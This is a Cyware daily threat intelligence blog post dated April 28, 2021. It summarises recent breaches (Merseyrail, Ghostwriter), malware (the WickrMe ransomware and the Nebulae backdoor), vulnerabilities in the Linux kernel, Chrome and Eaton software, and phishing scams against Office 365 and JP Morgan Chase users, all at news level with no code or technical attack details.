Go to listing page

Cyware Daily Threat Intelligence, April 28, 2021

Cyware Daily Threat Intelligence, April 28, 2021

Share Blog Post

Backdoors are hard to spot, but not for those who are using them. A new backdoor dubbed Nebulae has been spotted after a span of two years, during which it was used by a Chinese threat actor group Naikon, to launch a sophisticated cyberespionage campaign. The capabilities of the backdoor range from collecting system information to downloading and manipulating files.

Never a day passes by when ransomware attacks are not making the news, the cyber threat landscape witnesses another ransomware called WickrMe. The malware has been found targeting vulnerable SharePoint servers to drop a web shell that installs the Cobalt Strike beacon backdoor.

Phishing scams targeting Office 365 users and JP Morgan Chase users also made the headlines in the past 24 hours.

Top Breaches Reported in the Last 24 Hours

Merseyrail hit
The U.K. rail network Merseyrail was recently subjected to Lockbit ransomware attack. The attack was launched through an email from Heith email account with subject line, ‘Lockbit Ransomware Attack and Data Theft.’ The email pretends to be from Merseyrail’s Director.

Ghostwriter operation
A widespread disinformation campaign dubbed Ghostwriter has been tied to a cyber espionage group that leveraged compromised Twitter, Facebook and Instagram accounts. Between October 2020 and January 2021, researchers identified five new Ghostwriter operations conducted in both Polish and English language.

Top Malware Reported in the Last 24 Hours

New WickrMe ransomware
A new ransomware dubbed WickrMe has been found targeting SharePoint servers as a way to reach out to victims and negotiate the ransom fee. The vulnerability exploited in the attack, CVE-2019-0694, can allow attackers to take control over the SharePoint server to drop a web shell which can later be used to install a Cobalt Strike beacon backdoor.

New Nebulae backdoor
A new cyberespionage campaign that spanned for roughly two years had deployed a new backdoor called Nebulae. The campaign was launched by a Chinese threat actor group Naikon and targeted military organizations in Southeast Asia. The additional capabilities of Nebulae include collecting system information, manipulating files and folders, downloading files, and terminating processes on compromised devices.

Top Vulnerabilities Reported in the Last 24 Hours

Linux kernel vulnerability
An information disclosure vulnerability in the Linux kernel could have resulted in the leak of data and act as a channel for further compromise. The flaw, tracked as CVE-2020-28588, was found in the proc/pid/syscall functionality of 32-bit ARM devices running the OS. Linux kernel versions 5.10-rc4, 5.4.66, and 5.9.8 were impacted by the flaw and a patch to fix the issue was released on December 3.

Flaw patched in Chrome
An update released for Chrome 90 patches yet another serious vulnerability affecting the V8 JavaScript engine used by the web browser. Tracked as CVE-2021-21227, the flaw can be exploited for remote code execution of the targeted user’s browser. It is said to be related to CVE-2020-16040 and CVE-2020-15965.

Eaton patches flaws
Power management solution provider Eaton has released patches for its Intelligence Power Manager (IPM) software to address several serious vulnerabilities that could allow hackers to disrupt power supply. The flaws can be exploited for SQL injection, command execution, deleting arbitrary files, and uploading arbitrary files.

Top Scams Reported in the Last 24 Hours

A new phishing campaign
Researchers have uncovered a new phishing campaign that targets Office 365 users. The campaign is carried out using themed emails that include a convincing SharePoint document claiming to require an email signature urgently. Once the recipients click on the document, they are redirected to a phishing page that harvests their personal data.

JP Morgan impersonated
Two new phishing scams targeting customers of JPMorgan Chase Bank have been identified. Both attacks deploy social engineering and brand impersonation tactics in an attempt to steal customers’ login credentials. While the first scam impersonated the bank, the second scam impersonated the Chase Fraud department.


nebulae backdoor
naikon apt
hellowickrme ransomware
cobalt strike beacon backdoor
sharepoint servers

Posted on: April 28, 2021

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.